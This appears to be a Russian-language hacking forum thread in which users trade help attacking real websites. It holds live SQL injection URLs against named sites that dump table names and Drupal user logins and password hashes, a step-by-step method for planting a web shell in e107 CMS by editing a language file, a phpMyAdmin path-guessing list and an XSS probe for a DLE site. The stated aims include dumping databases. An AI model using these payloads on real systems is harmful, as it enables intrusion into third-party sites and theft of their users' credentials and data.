http://www.airport.lg.ua/index.php?page=-3+union+select+group_concat(0x0b,table_name)+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61+--+ aero_buttons, aero_pages, aero_pics_pages, aero_texts
Помогите составить запрос. Есть 5 бд, в бд 'de' есть таблица drupal_users, и там есть поля pass,access,login. При запросе +or+1+group+by+concat((select+concat( login,0x3a,pass)+from+drupal_users+limit+0,1),floor(rand(0)*2))having+min(0)+or+1+--+ запрос идет в 'de' а в другую бд.
http://www.tis.lg.ua/index.php?mod=page&page=-23'+union+select+1,group_concat(0x0b,table_name),3,4+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61+--+ gb_aut, gb_ip, gb_msg, gb_settings, lib_mat, lib_plan, lib_razdel, lib_reelt, lib_status, lib_tip, newnews, page, phonebook, photo, pr_dom, pr_kvartira, pr_nejil, pr_zemlya
Если я правильно понял эту мысль, то: Code: +or+1+group+by+concat((select+concat(access,0x3a,login,0x3a,pass)+from+de.drupal_users+limit+0,1),floor(rand(0)*2))having+min(0)+or+1+--+ всё по принципу select+колонки+from+бд.таблица
Подскажите в чем ошибка? http://www.urvet.ru/index.php?categoryID='+or+1+group+by+concat((select+table_ name+from+information_schema.tables+where+table_ schema='z33576_shop'+limit+0,1),fl oor(rand(0)*2))having+min(0)+or+1+--+
http://www.urvet.ru/index.php?categoryID=1+or+1+group+by+concat((select+table_name+from+information_schema.tables+where+table_schema=0x7a33333537365f73686f70+limit+0,1),floor(rand(0)*2))having+min(0)+or+1--+
Еще актуально Тут описание данного бага http://seclists.org/fulldisclosure/2011/Feb/254 Если этот раскрутить не удается предположительно есть еще одна бага тут http://zombie.cloud9crew.com/index.php?option=com_kunena&Itemid=86&func=announcement&do= Описание тут http://www.exploit-db.com/exploits/11279/ тут есть эксплойт http://www.exploit-db.com/exploits/9408/
Из information_schema таблицы и колонки выводятся нормально, но вывод из таблиц не происходит. Какие есть альтернативы вот этому? ...5,6,login,pass+from+users+limit+0,1--
Узнаешь table_schema > select 1,table_schema,3 from information_schema.tables where table_name='table_name'-- Выводишь данные > select 1,concat_ws(0x3a,username,password),3 from table_schema.table_name
Помню раньше на ачате была тема, а в ней предположительные диры где установлен pma, так вот искал и здесь и в гугле что то не нашел, может у кого есть?
Как можно залить шелл в e107 CMS если стоит ограничение через filetypes.php, т.е. через плагины/темы загрузить нельзя... цель - слить бд помогите
https://rdot.org/forum/showthread.php?t=3 пост Strilo4ka. Если не понял, то просто создаешь форму у себя на компе: PHP: <form enctype="multipart/form-data" action="http://[host]/[path]/e107_languages/lan_banner.php" method="post"> Отправить этот файл: <input name="file" type="file" value='b.php' /><br> Название шелла! <input name="p" type="text" value="b.php"> <input type="submit" value="Send File" /> </form> Заходишь e107_admin/language.php?tools . Там редактируешь файл lan_banner.php вписав в него ");?><?copy($_FILES[file][tmp_name],$_POST[p])?> . Затем через форму которую создал льешь шелл. Он будет по адресу http://[host]/[path]/e107_languages/shell.php
Code: web/phpMyAdmin/ admin/pma/ admin/phpmyadmin/ admin/mysql/ phpmyadmin2/ mysqladmin/ mysql-admin/ phpMyAdmin-2.5.6/ phpMyAdmin-2.5.4/ phpMyAdmin-2.5.1/ phpMyAdmin-2.2.3/ phpMyAdmin-2.2.6/ myadmin/ phpMyA/ phpmyad/ phpMyAdmin-2.6.0/ phpMyAdmin-2.6.0-pl1/ phpMyAdmin-2.6.3-pl1/ phpMyAdmin-2.6.3/ phpMyAdmin-2.6.3-rc1/ phpMyAdmin-2.6.2-rc1/ phpMyAdmi/ phpMyAdmin1/ phpMyAdmin2/ phpMyAdmin-2/ phpMyAdmin-2.10.0/ phpMyAdmin-2.3.0/ phpMyAdmin-2.3.1/ phpMyAdmin-2.3.2/ phpMyAdmin-2.3.3/ phpMyAdmin-2.3.4/ phpMyAdmin-2.3.5/ phpMyAdmin-2.3.6/ phpMyAdmin-2.3.7/ phpMyAdmin-2.3.8/ phpMyAdmin-2.3.9/ phpMyAdmin-2.4.0/ phpMyAdmin-2.4.1/ phpMyAdmin-2.4.2/ phpMyAdmin-2.4.3/ phpMyAdmin-2.4.4/ phpMyAdmin-2.4.5/ phpMyAdmin-2.4.6/ phpMyAdmin-2.4.7/ phpMyAdmin-2.4.8/ phpMyAdmin-2.4.9/ phpMyAdmin-2.5.0/ phpMyAdmin-2.5.1/ phpMyAdmin-2.5.2/ phpMyAdmin-2.5.3/ phpMyAdmin-2.5.4/ phpMyAdmin-2.5.5/ phpMyAdmin-2.5.6/ phpMyAdmin-2.5.7/ phpMyAdmin-2.5.8/ phpMyAdmin-2.5.9/ phpMyAdmin-2.6.0/ phpMyAdmin-2.6.1/ phpMyAdmin-2.6.2/ phpMyAdmin-2.6.3/ phpMyAdmin-2.6.4/ phpMyAdmin-2.6.5/ phpMyAdmin-2.6.6/ phpMyAdmin-2.6.7/ phpMyAdmin-2.6.8/ phpMyAdmin-2.6.9/ phpMyAdmin-2.7.0/ phpMyAdmin-2.7.1/ phpMyAdmin-2.7.2/ phpMyAdmin-2.7.3/ phpMyAdmin-2.7.4/ phpMyAdmin-2.7.5/ phpMyAdmin-2.7.6/ phpMyAdmin-2.7.7/ phpMyAdmin-2.7.8/ phpMyAdmin-2.7.9/ phpMyAdmin-2.8.1/ phpMyAdmin-2.8.2/ phpMyAdmin-2.8.3/ phpMyAdmin-2.8.4/ phpMyAdmin-2.8.5/ phpMyAdmin-2.8.6/ phpMyAdmin-2.8.7/ phpMyAdmin-2.8.8/ phpMyAdmin-2.8.9/ phpMyAdmin-2.9.1/ phpMyAdmin-2.9.2/ phpMyAdmin-3/ phpMyAdmin-4/ phpMyAds/ phpmyad-sys/
привет есть сайт на DLE, версию не знаю есть уязвимость вида Code: http://site.ru/index.php?subaction=userinfo&user=%2527 при подстановки sql запроса, все что я написал выводится в title, мб кто сталкивался с раскруткой такой inj
Да ничего, обычный вывод в тайтл. Попробуй ввести туда PHP: </title><script>alert(/1/)</script> Может xss будет